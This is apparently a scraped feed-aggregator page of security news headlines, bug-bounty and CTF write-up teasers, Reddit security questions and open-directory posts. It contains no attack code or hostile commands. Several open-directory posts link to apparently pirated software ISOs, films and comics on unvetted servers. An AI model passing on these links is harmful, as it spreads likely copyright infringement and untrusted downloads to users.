    Hello Everyone, Continue reading on Medium »  ( 2 min )
    One Click To Account Takeover
    Hello amazing hunters. Continue reading on Medium »  ( 1 min )
    A tale of zero click account takeover
    Hello there! I hope everything is going well with you; today I’m back with the story of my first critical discovery on Hackerone, which is… Continue reading on Pentester Nepal »  ( 3 min )
  • Open

    Go Fuzzing
    Article URL: https://tip.golang.org/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=29761092 Points: 175 # Comments: 49  ( 3 min )
  • Open

    I found and fixed a vulnerability in Python's source code
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
    Fixing the Unfixable: Story of a Google Cloud SSRF
    submitted by /u/xdavidhu [link] [comments]  ( 1 min )
    Build your own reconnaissance system with Osmedeus Next Generation
    submitted by /u/j3ssiejjj [link] [comments]  ( 1 min )
  • Open

    AQUATIC PANDA in Possession of Log4Shell Exploit Tools
    submitted by /u/dmchell [link] [comments]
    Phishing o365 spoofed cloud attachments
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using ToolHelp32 API
    Get a detailed walk-through on the code of process listing using ToolHelp32 API from scratch. You will also learn to enumerate the threads and modules for each process and will know about its advantages and challenges https://tbhaxor.com/windows-process-listing-using-toolhelp32/ submitted by /u/tbhaxor [link] [comments]
    Code snippets for windows api exploitation for red and blue teams
    https://github.com/tbhaxor/WinAPI-RedBlue submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-01-01 Review
    2021年安全架构总结以及2022安全方向展望 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-01-01 Review
    2021年安全架构总结以及2022安全方向展望 by ourren 更多最新文章,请访问SecWiki
  • Open

    A question about subnetting.
    I'm very new to networking so apologies if this is a stupid question. I'm given a network ID of 172.16.1.0 /24. I need to subnet this for LAN 1 (60 hosts) and LAN 2 (20 hosts). I believe my network ID for LAN 1 will be 172.16.1.0 /26, and for LAN 2 it will be 172.16.1.64 /27. The issue is, when I try to assign LAN 1s network ID to G/0/0/0 with the subnet mask of 255.255.255.192 it doesn't work, I understand that it's class B which is usually 255.255.0.0, but if the CIDR is /26 shouldn't it be 255.255.255.192 despite this? Any feedback would be greatly appreciated thank you! submitted by /u/crumbjuice [link] [comments]  ( 2 min )
  • Open

    如何使用ChopChop扫描终端并识别暴露的敏感内容
    帮助广大研究人员针对Web应用程序进行动态应用程序测试。  ( 1 min )

  • Open

    나의 메인 Weapon 이야기 ⚔️ (ZAP and Proxify)
    한국 기준으로 새해까지 약 30분이 남았고, 올해의 글은 이 글이 마지막 글이 될 것 같습니다. 분명 2020 회고한지가 얼마 안된 것 같은데, 벌써 2021도 회고도 이미 지나버렸네요 😱 오늘은 제 회고 내용 중 하나인 Main Weapon에 대한 이야기를 하려고 합니다 :D Main Weapon? 여러분들은 분석 시 어떤 도구를 제일 좋아하시나요? 여기서 하나 고를 수 있는 도구를 저는 Main Weapon이라고 생각합니다. 저는 긴 시간 동안 Burpsuite 유저였었고, 2018년 정도부터 ZAP에 다시 관심이 크게 생겼고 결국 작년까지는 Burpsuite와 ZAP을 동시에 사용하는 듀얼 스타일을 고수했었습니다.
  • Open

    Should I Block/Disable ICMP on router Firewall?
    Should I disable ICMP Ports on my ISPs Routers Firewall? I have heard a mix of different things. I'm trying to increase security, but I understand it will impact network monitoring by disabling it. I'm looking to disable ping. This router doen't have much options besides disiabling Incoming & outgoing and setting custom rules. Should I just disable Incoming ICMP? What can i do If anything that will increase security of ICMP. submitted by /u/Wind0ze_User [link] [comments]  ( 2 min )
    Tiktok
    1.Is it true that TikTok app is spyware? Can they access and watch us through our phone's camera even when we're not using the app? 3 . Is this is true, then how is that even legal to spy on users? Especially, minors who use this app more. submitted by /u/hamza_37 [link] [comments]  ( 3 min )
    Spyware
    Will a malware/virus/spyware still exist even after you uninstall an app from playstore or not? I downloaded many strange apps from google playstore ,uninstalled them and ran a Malwarebytes scan and nothing bad showed up, should I still be worried? submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    About blockchain dapps security
    Hello I m a pen testing student doing my oscp right now and I m interested in blockchain and dapp security-pentesting. Is there a roadmap? what skills I must acquire to get me there besides learning a dapp language like plutus or solidity? Thanks in advance! submitted by /u/GeorgiosSAK [link] [comments]  ( 1 min )
  • Open

    Open-Source Intelligence (OSINT) Reconnaissance
    *Note: This article was originally published by the author on November 5, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 8 min )
    OSINT tweets liked by @aqfiazfan in Jan — Des 2021
    Saya selalu menjadikan fitur likes di twitter sebagai lemari penting untuk menyimpan informasi terkait OSINT yang menurut saya menarik… Continue reading on Medium »  ( 1 min )
    TryHackMe — Sakura Walkthrough
    Sakura is an OSINT-focused room created by The OSINT Dojo. The room is designed to test a variety of OSINT techniques, such as social… Continue reading on Medium »  ( 5 min )
  • Open

    Evasion & Obfuscation Techniques
    *Note: This article was originally published by the author on November 7, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 10 min )
  • Open

    Over 2.2k fonts that you can extract to your Fonts folder. (.ttf / .otf)
    Hey everyone, I have a zip file that has over 2.2k fonts that you can just extract into your Fonts folder, for example: C:\Windows\Fonts Here is the zip file, hope everyone enjoys. zip: https://drive.google.com/file/d/1bk_CFZn8CYeYDX_yiE_CPNVh4aKz2Oea/view?usp=sharing (G.Drive) submitted by /u/imjustalazyretard [link] [comments]  ( 1 min )
    My OD. Movies, Documentaries, Music, Software, ISO's and some other data.
    https://truth-or-ner.xyz/shared/ A little bit of my personal data hoard. Server has 1Gbit/s upload speed so you can grab what you want pretty quickly. Enjoy. Also happy new year! I believe that HTTPS is important but here's a link if you want to access the site without it: http://truth-or-ner.xyz/shared/ Some examples from the OD, what to expect: ISO's: Adobe Master Collection 2021, Windows 7 original, untouched versions Movies and Series: Karen, The Death of Stalin, Paper Towns, Nanny McPhee, Hidden Figures, The billion dollar code[series] Docu: Pandas 2018 docu, Inside facebook - Secrets Of A Social Network, The British Empire in Colour (3 ep) Music: mainly 2010's pop and dance I have uploaded a few more stuff since KoalaBear made the OD scan, so here's a new one: Extension (Top 5) Files Size .mkv 20 70.73 GiB .iso 6 42.51 GiB .mp4 9 12.99 GiB .zip 9 5.25 GiB .flac 49 1.69 GiB TOTAL 117 133.43GiB ​ submitted by /u/techleves [link] [comments]  ( 1 min )
    Top 25o imdb movies-But see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Books/Manuals (includes Harry Potter, Alex Rider)
    submitted by /u/International_Milk_1 [link] [comments]
    runaways comics
    submitted by /u/International_Milk_1 [link] [comments]
    Ace Books (https://en.wikipedia.org/wiki/Ace_Books)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Comics - Google Drive (lets see if this last any longer)
    submitted by /u/International_Milk_1 [link] [comments]
    some vertigo comics
    submitted by /u/International_Milk_1 [link] [comments]
    75 Gigs of Docs direct dl and w/torrent available
    https://archive.org/details/pbsnovadocs submitted by /u/SingingCoyote13 [link] [comments]  ( 1 min )
    Image hosting site, mainly photos for auctions
    https://www.datazap.net/sites/ Did not see any nsfw, but did not look at everything submitted by /u/c-rn [link] [comments]
  • Open

    serpentine - C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    New year, new password habit
    submitted by /u/Novel_Author [link] [comments]  ( 1 min )
    New year, new password habit
    submitted by /u/Novel_Author [link] [comments]  ( 1 min )
  • Open

    Javascript 101 — Comparison & Conditions — 04
    Before reading that article you can also check Javascript-101 Embedding objects and arrays. Continue reading on Medium »  ( 3 min )
    My first Google HOF
    Whoever starts learning about bug hunting, their dream is to get a bounty and HOF from Google. I too got successful in June 2021 when I… Continue reading on Medium »  ( 2 min )
    AWS Lambda Command Injection
    Command Injection vulnerability is a daunting one. In this vulnerability, a threat actor can execute arbitrary commands on a host. Continue reading on Towards AWS »  ( 4 min )
  • Open

    SecWiki News 2021-12-31 Review
    万字长文:物联网十年简史 by ourren Typora 授权解密与剖析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-31 Review
    万字长文:物联网十年简史 by ourren Typora 授权解密与剖析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 5 — Pesky Elf Forum
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    @RealTryHackMe #AdventOfCyber Series: Challenge 4 — Santa’s Running Behind
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 5 — Pesky Elf Forum
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    @RealTryHackMe #AdventOfCyber Series: Challenge 4 — Santa’s Running Behind
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
  • Open

    Improper authorization allows disclosing users' notification data in Notification channel server
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/1314162 - Bounty: $2000
    ADB Backup is enabled within AndroidManifest
    Zivver disclosed a bug submitted by hack_4fun: https://hackerone.com/reports/1225158
  • Open

    PIT HackTheBox Walkthrough
    Pit is a CTF Linux box with difficulty rated as a medium on Hack The Box platform. Let’s deep dive into breaking down this machine. The post PIT HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    PIT HackTheBox Walkthrough
    Pit is a CTF Linux box with difficulty rated as a medium on Hack The Box platform. Let’s deep dive into breaking down this machine. The post PIT HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    FreeBuf早报 | 京都大学77TB数据被误删;2022 年值得关注的5大网络安全趋势
    日本京都大学在网站发布公告,由于惠普超级计算机的备份系统出现错误,学校丢失了大约 77TB的研究数据。  ( 1 min )
    FreeBuf甲方群讨论 | 年度总结,甲方网安人的2021
    这一年有哪些令你印象深刻的事件,带给你怎样的思考,对行业现状及发展态势有何看法?甚至是聊聊职业本身,对未来职业发展有何规划?  ( 1 min )
    FreeBuf周报 |《“十四五”国家信息化规划》发布;Apache 修复关键漏洞
    我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    Kimsuky组织针对韩国新闻行业的钓鱼活动分析
    Kimsuky是一个疑似来源于半岛方向的网络间谍组织,其至少自 2012 年以来一直保持活跃。  ( 1 min )
    为什么说减少开发人员和安全团队之间摩擦有助提高软件安全性
    与其将安全性推迟到以后,不如让它成为开发过程的核心部分。
    渗透测试之地基服务篇:服务攻防之框架Struts2(上)
    Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。  ( 1 min )
    新型恶意软件 iLOBleed Rootkit,首次针对惠普 iLO 固件
    iLOBleed 是有史以来首次针对惠普 iLO 固件的恶意软件。  ( 1 min )
    日本惠普超算系统出错,京都大学多达77TB数据被误删
    日本京都大学在网站发布公告称,由于惠普超级计算机的备份系统出现错误,学校丢失了大约 77TB的研究数据。
  • Open

    Windows Process Listing Using WTS API
    In these detailed walkthroughs of process listing using WTS API, you will learn the importance of the process listing and enumeration of anti-malware agents and will get your hands dirty with the source code https://tbhaxor.com/windows-process-listing-using-wtsapi32/ https://tbhaxor.com/windows-process-listing-using-wtsapi32-2/ submitted by /u/tbhaxor [link] [comments]

  • Open

    Movies and tv, but not sure how much in english. Seems to be vey slow.
    submitted by /u/International_Milk_1 [link] [comments]
    Racer X stuff
    submitted by /u/International_Milk_1 [link] [comments]
    Creating your own flair
    So you want to share a link to top secret documents. You want to call the Flair "Could get you killed" Just pick any of the default flairs, enter it in document, highlight it, and write "could get you killed" instead. submitted by /u/International_Milk_1 [link] [comments]
    comics, and Ebooks
    submitted by /u/International_Milk_1 [link] [comments]
    ]Kamen Rider Build BD Box Complete Series [1080p]-english subs
    submitted by /u/International_Milk_1 [link] [comments]
    Star tek films, movies. comics. etc etc
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Ghibli's Films - Google Drive
    submitted by /u/International_Milk_1 [link] [comments]
    Bond movies (Note sure, if this is correct link)-see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Games (don't know if link's work)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Tom and Jerry cartoons
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    comics
    submitted by /u/International_Milk_1 [link] [comments]
    Movies
    http://167.114.174.132:9092/movies/ Haven't looked too far thru this yet but good amount of movies. submitted by /u/Prhymus [link] [comments]
    Indian (I'm assuming) music
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    Not only cybersecurity
    Hi, I really love cybersecurity stuff, but as I practice with TryHackMe/HackTheBox labs, I feel that some programming knowledge is also required. What are your studying topics, besides offensive/defensive techniques? Can you recommend some good resources for PHP, assembler, javascript and so on? Thankyou!! submitted by /u/g-simon [link] [comments]  ( 1 min )
    DNSSEC with unsigned records set
    Hello everyone, I'm currently implementing a DNSSEC validator (at https://github.com/qdm12/dns). It's working so far, but most zones aren't signed (even google.com it seems). How is a DNSSEC validator meant to handle unsigned cases? Should it just let it through without any validation? Or should it check somewhere else if a zone is meant to be signed? Or should we patiently wait for DNSSEC to be more widely adopted? I'm wondering for example in the case an attacker hacks an authoritative nameserver like Cloudflare's 1.1.1.1 and returns bad records without their previously existing RRSIG signatures. A DNSSEC validator (without caching or on a cold boot) will not detect the bad records from Cloudflare right? Thanks in advance! submitted by /u/dowitex [link] [comments]  ( 1 min )
    Are Server+, Cloud+, and Linux+ certifications useful for InfoSec?
    submitted by /u/Connect_Estate_8617 [link] [comments]  ( 1 min )
    I accessed someone else's Yahoo mail by mistake. This needs to get fixed ASAP
    hello everyone I got a new phone number, and something really unbelievable happened to me: I was able to access someone else's Yahoo! mail account - the previous user of that phone number. I Googled it to see if anyone else has experienced this, and cybersecurity expert Brian Krebs reports that has in this article: https://krebsonsecurity.com/2019/03/why-phone-numbers-stink-as-identity-proof/ From the article itself : " This is exactly what happened recently to a reader who shared this account: A while ago I bought a new phone number. I went on Yahoo! mail and typed in the phone number in the login. It asked me if I wanted to receive an SMS to gain access. I said yes, and it sent me a verification key or access code via SMS. I typed the code I received. I was surprised that I didn’…  ( 4 min )
    Is IT experience a requirement for SOC Analyst?
    Is it required that you worked in the help desk or be a sysadmin? If so, how many years? Or is home experience enough for the roll(example: homelab, ctfs, github projects) submitted by /u/RaZdoT [link] [comments]  ( 2 min )
    Phone Tapping -- Call Forwarding UNconditionally, but everything else is NOT forwarded
    So I checked my dad's phone for tapping. This is what the system message said: Call forwarding unconditionally. Voice: Not forwarded Data: Not forwarded FAX: Not forwarded SMS: Not forwarded Sync: Not forwarded Async: Not forwarded Packet: Not forwarded PAD: Not forwarded OK Given the info above, is he still being phone tapped? Last time, he was and I saw the number. Now I didn't. submitted by /u/Then-Mathematician76 [link] [comments]  ( 1 min )
    Are You Running Linux As Your Main Workstation?
    Are you running Linux as your main workstation? What do the professionals run as their main operating system? submitted by /u/No_Secret6425 [link] [comments]  ( 2 min )
    Offsec Discontinue Kali on Azure?
    Did Offensive Security discontinue support for Kali on the Azure cloud? https://github.com/Azure/azure-cli/issues/17469 Found this thread and can’t find Kali in the azure marketplace or on their site anymore. submitted by /u/DeadbeatHoneyBadger [link] [comments]
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Read-only user can edit user segments.
    Mail.ru disclosed a bug submitted by astates: https://hackerone.com/reports/1277753
    DLL hijacking in Monero GUI for Windows 0.17.3.0 would allow an attacker to perform remote command execution
    Monero disclosed a bug submitted by fukuyama: https://hackerone.com/reports/1437942
    API- /
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1354452
    Change project visibility to a restricted option
    GitLab disclosed a bug submitted by s4nderdevelopment: https://hackerone.com/reports/1086781 - Bounty: $1370
  • Open

    Windows Privilege Escalation: Kernel Exploit
    As this series was dedicated to Windows Privilege escalation thus I’m writing this Post to explain command practice for kernel-mode exploitation. Table of Content What The post Windows Privilege Escalation: Kernel Exploit appeared first on Hacking Articles.  ( 5 min )
  • Open

    Windows Privilege Escalation: Kernel Exploit
    As this series was dedicated to Windows Privilege escalation thus I’m writing this Post to explain command practice for kernel-mode exploitation. Table of Content What The post Windows Privilege Escalation: Kernel Exploit appeared first on Hacking Articles.  ( 5 min )
  • Open

    Here’s How I Could Read Anyone’s Iphone Metrics Remotely.
    Hello, My name is Faizan. I’m a security researcher. Hope you like this blog. If you’ve any questions please feel free to reach out . Continue reading on Medium »  ( 2 min )
    TryHackMe Writeup : Solar, exploiting Log4J
    Hi there, Continue reading on Medium »  ( 6 min )
    Javascript 101 - Embedding objects & Arrays — 03
    Before reading this, you can look at Javascript 101 — Arithmetic Operators, Code Editors, Functions, Objects, and Arrays — 02. Continue reading on Medium »  ( 3 min )
    Caduceus Bug Bounty Challenge
    Caduceus has just entered its public testing phase and is launching this hackathon to identify bugs. Continue reading on Medium »  ( 2 min )
    Bitswift Unlimited Mint Bugfix Postmortem
    Summary Continue reading on Immunefi »  ( 4 min )
    The Password Bypass Leads to Full-Account-Takeover
    Hola Hackers, I’m Saransh Saraf aka MR23R0 Continue reading on Medium »  ( 1 min )
  • Open

    [Cellebrite Physical Analyzer] Basic usage question, easily resuming a session/case with multiple extractions
    Just started working with this program. I understand how to open and browse extractions, but I can't figure out if there's a better way to pick up where I left off after closing the program, I end up having to open/import all the extractions one by one again. For most programs that I'm familiar with, a "case" contains one or more extractions that I imported and "opening a case" tends to be a convenient way to bring up all the extractions in one "click". However, based on how little experience I have with PA, "opening a case" seems to just be a prompt to import extractions all over again. I thought about using "project sessions", but it seems to be something that you open after all the extractions are open that remembers what analysis you've done, not necessarily what devices you were working on. Can anyone speak to this? Am I oblivious to a basic function that lets me easily open all the extractions I had open? Maybe I'm supposed to create a portable case (UFDX?) or something? submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-30 Review
    ZN600电信光猫分析 —— 初识 by ourren 写给研发同学的富文本安全过滤方案 by ourren Tenda AX12路由器设备分析(二)之UPnP协议 by ourren 一款通过污点追踪发现Jsp webshell的工具 by ourren 快速探测目标防火墙出网端口的工具化实现 by ourren 聊聊配置文件 RCE 这件事 by ourren 扫描器性能分析案例 by ourren 内核态eBPF程序实现容器逃逸与隐藏账号rootkit by ourren 软件供应链安全发展洞察报告(2021年) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-30 Review
    ZN600电信光猫分析 —— 初识 by ourren 写给研发同学的富文本安全过滤方案 by ourren Tenda AX12路由器设备分析(二)之UPnP协议 by ourren 一款通过污点追踪发现Jsp webshell的工具 by ourren 快速探测目标防火墙出网端口的工具化实现 by ourren 聊聊配置文件 RCE 这件事 by ourren 扫描器性能分析案例 by ourren 内核态eBPF程序实现容器逃逸与隐藏账号rootkit by ourren 软件供应链安全发展洞察报告(2021年) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    I wrote a replacement for Pyrasite to inject code into Python processes on Kubernetes
    submitted by /u/nyellin [link] [comments]  ( 1 min )
    Bootkit samples
    submitted by /u/hardenedvault [link] [comments]
  • Open

    TryHackMe | CTF | Walkthrough | Raven
    Checkout this virtual machine on TryHackMe. LogIn on TryHackMe, go to rooms → raven1he. Link: https://tryhackme.com/room/raven1he Continue reading on Medium »  ( 3 min )
  • Open

    Upgrade your OSINT investigations with Maltego
    What is Maltego anyway? Continue reading on Medium »  ( 1 min )
    OSINT — Sakura (TryHackMe walktrough)
    The OSINT Dojo recently found themselves the victim of a cyber attack. It seems that there is no major damage, and there does not appear… Continue reading on Medium »  ( 2 min )
  • Open

    FreeBuf早报 | 微信小程序调用个人信息需授权;亚马逊 Alexa 语音助手越界
    2022年2月21日起,小程序访问蓝牙、通讯录,以及添加日历事件,必须经过用户授权。  ( 1 min )
    威胁狩猎架构体系架构与实践 | CIS 2021 Spring·春日版大会议题初探
    威胁狩猎是目前业内公认的最有效的主动型安全解决方案之一,可最大限度降低网络攻击对企业的危害。  ( 1 min )
    T-Mobile称:用户数据泄露由SIM卡交换攻击引起
    美国电信运营商T-Mobile发生了一起数据泄露事件,有不明数量的客户遭受了SIM交换攻击。
    DevSecOps建设之白盒续篇
    探索一款既能够满足企业内部自动化审计需求、又能够辅助白帽子日常快速挖掘漏洞的工具。  ( 4 min )
    IoT蜜罐展示物联网设备存在的网络威胁
    蜜罐历来被用作诱饵设备,帮助研究人员更好地了解网络上威胁的动态及其影响。  ( 1 min )
    超1200个网站使用MitM钓鱼工具包,允许网络犯罪分子绕过 2FA 身份验证
    中间人网络钓鱼工具包是不需要人工操作的实时网络钓鱼工具包,因为一切都是通过反向代理自动完成。  ( 1 min )
    ThinkPHP5反序列化利用链总结与分析
    本文将总结分析ThinkPHP5.0和5.1中的反序列化利用链,一方面以备不时之需,另一方面算是对php反序列化的深入学习。  ( 6 min )
    应急响应-Yara规则木马检测
    Yara是一个基于规则的恶意样本分析工具,可以帮助安全研究人员和蓝队分析恶意软件,并且可以在应急取证过程中自定义检测规则来检测恶意软件。  ( 1 min )
    地铁安防门被曝存在多个严重的安全漏洞
    这些漏洞可能允许远程攻击者绕过身份验证要求、篡改金属探测器配置,甚至在设备上执行任意代码。  ( 1 min )
    大型车企隐秘接口连续被泄露 我们该如何盘点公司资产
    大型甲方企业如何做资产盘点
    《2021企业安全运营实践报告》发布:从被动防御到主动出击
    从被动转主动,企业安全运营体系已牢牢抓住主动权。  ( 1 min )
  • Open

    갑작스럽게 kubectl not found가 발생했다면 😫
    평소에 잘 쓰던 kubectl이 갑자기 not found가 발생했습니다. (아마 특정 시점에 brew upgrade로 인해 문제가 됬을 것 같아요) zsh: command not found: kubectl 이미 설치된 상태이고, 재 설치를 해도 동일했습니다. 여기저기 찾아보니 homebrew로 설치한 경우에서 이 이슈가 발생하는 것 같은데요. brew로 kubectl을 재 설치하고 brew link로 설치된 파일을 심볼릭 링크로 homebrew prefix와 연결해주면 다시 명령을 사용할 수 있습니다. $ brew reinstall kubectl $ brew link --overwrite kubernetes-cli 참고로 homebrew prefix는 homebrew에서 사용하는 PATH 경로입니다.

  • Open

    Why haven't African countries invested much in the Cybersecurity Industry?
    Most of the African countries don't know what Cybersecurity is!. Some know it but they have not yet faced a serious risk!. This is the main reason why countries like Uganda don't embrace Cybersecurity and Technology at large and this causes a serious threat to a country shortly because technology is becoming unavoidable! submitted by /u/Cyber_Catalyzer [link] [comments]  ( 1 min )
    Question about java deobfuscation HTB module
    hi all, I am doing the "Javascript deObfuscation" module on hackthebox platform (very very nice!) I read this: As previously mentioned, the above-used method of obfuscation is packing. Another way of unpacking such code is to find the return value at the end and use console.log to print it instead of executing it. Can anyone explain me this? Possibly with an example? Thankyou submitted by /u/g-simon [link] [comments]  ( 1 min )
    Nessus says IPMI hashes are disclosed, but metasploit's ipmi_dumphashes returns nothing?
    I see this fairly frequently during pentests where Nessus raises an issue about IPMI Hash Disclosure, but of course doesn't show any hashes. When using ipmi_dumphashes I get nothing in response. Does anyone know any other utilities to check for IPMI hash disclosure and confirm if Nessus is giving me a false positive? submitted by /u/security_intern [link] [comments]  ( 1 min )
    Someone is trying to access my accounts...what to do?
    I believe someone is in possession of my personal information and is trying to access my accounts. Over the last few days I have been prompted to confirm my identity in Venmo and Paypal. I also just received notice that someone is trying to access my Twitter account in Ecuador. ​ I have changed my Google password and all of my financial passwords. I have not detected any fraudulent activity on any of my cards, but am at a loss what to do next. Should I simply change every password I have? Is there a better course of action? ​ The only way I can think they may have gotten my information was is that I pirate tv shows on my personal computer. It recently blue screened and I had to wipe everything. ​ Pretty much at a loss for what to do at this step as it seems someone is attempting to access my account, but at this point hasn't been able to bypass 2fa or basic security questions. submitted by /u/LechronJames [link] [comments]  ( 2 min )
    Looking for advice and recommendations for RMM software.
    We're dealing with sensitive and juicy data, protected by strict regulations, in an environment in an environment where we could be targeted for being a little start up with access to some very interesting things. I'm of two minds. . . On the one hand, just the presence of RMM is a potential vuln (especially giving some cloud service admin access to my devices). On the other hand, I want to be able to keep track of stuff (and audit my users, who are scattered around the country, at least quarterly). I need an RMM solution for MacOS and Windows both that has a good track record and (hopefully) a reasonably open audit history. I'd feel more comfortable with something where I can host my own server, not have it call home somewhere in the cloud (I realise that's probably a nonstarter, at least as far as MacOS is concerned). I was moderately excited about Tactical RMM, but after what just happened with them, I'm a "hell no!" on that one. Any thoughts on this? submitted by /u/thebardingreen [link] [comments]  ( 1 min )
    Best password manager?
    Hey security folks help me out to choose best password manager. Let me know which password manager you are using and why? What's the best password manager betweens 1password vs dashlane vs bitWarden? submitted by /u/noob_bug_hunter [link] [comments]  ( 4 min )
  • Open

    PrintNightmare and SSH Tunnels
    submitted by /u/m_edmondson [link] [comments]
    Flagpro malware is threatening enterprises and is backed by Chinese hackers
    submitted by /u/Gengar-boy [link] [comments]  ( 1 min )
    How I built the PoC for the Log4j zero-day security vulnerability
    submitted by /u/melbadry9 [link] [comments]
  • Open

    open directories containing music (4)
    01 - Original Sound Track Tokusatsus - ddl.tokusatsu-fansub.fr > Musiques > Tokusatsus Collection MP3 OST e BGM > 01 - Original Sound Track Tokusatsus Index of /criticalmasscatania/data/media (inventati.org) Index of /mp3 (pinballnirvana.com) Index of /tunes (syer.net) Index of /Music Index of /ftp/MP3 (bahiabeachtenerife.com) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (3)
    http://wrobradio.com/mp3s/ http://www.crypthome.com/members/Belle/vwavvv/ http://www.ibiblio.org/pha/dawk/Audio/ http://www.crescentmoon.club/All%20Music/ http://files.sfenyc.com/Music/?C=M;O=A http://woodrosepsp.com/judy/MUSIC/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (2)
    http://www.captainspud.com/stuff/music/ http://cvltnation.com/wp-content/audio/ https://anorg.chem.uu.nl/people/staff/FrankdeGroot/woXS/ https://dl.msbmusic.ir/d1/1398/Music/09/ http://tka4.org/tka4/articles/Music%20Listening/sound/ https://www.iutbayonne.univ-pau.fr/~lopis/BBand/Divers/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (1)
    https://www.acroche2.com/mid_jazz/ http://148.72.150.188/archive/access/audio/ http://91.121.145.85/panel/136/henk/Blue%20Note%20The%20Ultimate%20Jazz%20Collection/Blue%20Note%20-%20The%20Ultimate%20Jazz%20Collection%20-%20CD1/ http://pix.klunch.com:555/mp3/ http://www.doctorwhofanshop.com/mov/ https://ia801002.us.archive.org/27/items/tntvillage_381703/John%20Coltrane%20-%20Legacy%20%28Impulse%21%29%20%281955-67%29%20%28Disc%201%20-%20Harmonic%20%26%20Melodic%29/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    ARCHIVES OF INTERNET RADIO SHOWS. Music and interviews seemingly. Might be easier to check parent directory first.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Various operating system ISOs
    submitted by /u/Plastic_Preparation1 [link] [comments]
    An Audiobook for every novel in the Nero Wolfe detective series by Rex Stout
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Music. Hmm. Some of it is the original artists at least in the first directory. The rest seems to be covers and maybe original material by some french band. There is a trio mentioned in parent folder. But in open directory folders which have people's names, there are more than 3 folders. Whew.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    classical music in some of the directories.
    submitted by /u/International_Milk_1 [link] [comments]
    Telegram bot-OD downloader
    I am thinking of creating a telegram bot that crawls and downloads OD, is that already done? Is it a good idea? And could I be legally accused with anything? submitted by /u/_NullPointerEx [link] [comments]  ( 3 min )
  • Open

